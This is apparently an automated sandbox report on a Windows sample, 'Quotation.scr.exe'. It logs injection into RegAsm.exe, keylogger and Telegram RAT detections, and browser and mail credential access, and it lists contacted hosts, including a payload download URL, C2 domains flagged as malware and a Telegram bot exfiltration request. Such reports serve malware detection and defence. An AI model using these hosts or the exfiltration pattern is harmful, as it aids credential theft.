                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A37008Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeQueries volume information: C:\Users\user\Desktop\Quotation.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		11
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		31
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		311
                    Process Injection                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                    Obfuscated Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing                    		Cached Domain Credentials13
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Quotation.scr.exe29%VirustotalBrowse
                    Quotation.scr.exe32%ReversingLabsWin32.Dropper.Generic
                    Quotation.scr.exe100%AviraHEUR/AGEN.1308518
                    Quotation.scr.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    eg-mart.com0%VirustotalBrowse
                    reallyfreegeoip.org0%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://eg-mart.com0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/14436606/233540%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://www.office.com/0%VirustotalBrowse
                    https://eg-mart.com1%VirustotalBrowse
                    https://api.telegram.org1%VirustotalBrowse
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    http://checkip.dyndns.org0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://api.telegram.org/bot2%VirustotalBrowse
                    https://www.office.com/lB0%VirustotalBrowse
                    http://checkip.dyndns.org0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%VirustotalBrowse
                    http://checkip.dyndns.org/0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/14436606/233540%VirustotalBrowse
                    https://stackoverflow.com/q/11564914/23354;0%Avira URL Cloudsafe
                    http://checkip.dyndns.org/0%VirustotalBrowse
                    https://stackoverflow.com/q/2152978/233540%Avira URL Cloudsafe
                    http://checkip.dyndns.org/q0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/11564914/23354;0%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    https://eg-mart.com/Mytiypg.vdf0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    https://reallyfreegeoip.org/xml/0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/2152978/233540%VirustotalBrowse
                    https://eg-mart.com/Mytiypg.vdf0%VirustotalBrowse
                    https://reallyfreegeoip.org0%VirustotalBrowse
                    https://reallyfreegeoip.org/xml/0%VirustotalBrowse
                    http://checkip.dyndns.org/q0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    eg-mart.com
                    		135.181.160.46
                    		truefalseunknown
                    reallyfreegeoip.org
                    		188.114.96.3
                    		truetrueunknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrueunknown
                    checkip.dyndns.com
                    		132.226.8.169
                    		truefalseunknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.org/false
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://eg-mart.com/Mytiypg.vdffalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/RegAsm.exe, 00000002.00000002.4574409470.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://eg-mart.comQuotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://stackoverflow.com/q/14436606/23354Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.orgRegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netJQuotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/botQuotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.office.com/lBRegAsm.exe, 00000002.00000002.4574409470.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netQuotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.orgRegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=enRegAsm.exe, 00000002.00000002.4574409470.0000000002EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://varders.kozow.com:8081Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20aRegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://aborters.duckdns.org:8081Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netiQuotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33$RegAsm.exe, 00000002.00000002.4574409470.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://anotherarmy.dns.army:8081Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://stackoverflow.com/q/11564914/23354;Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://stackoverflow.com/q/2152978/23354Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.org/qQuotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
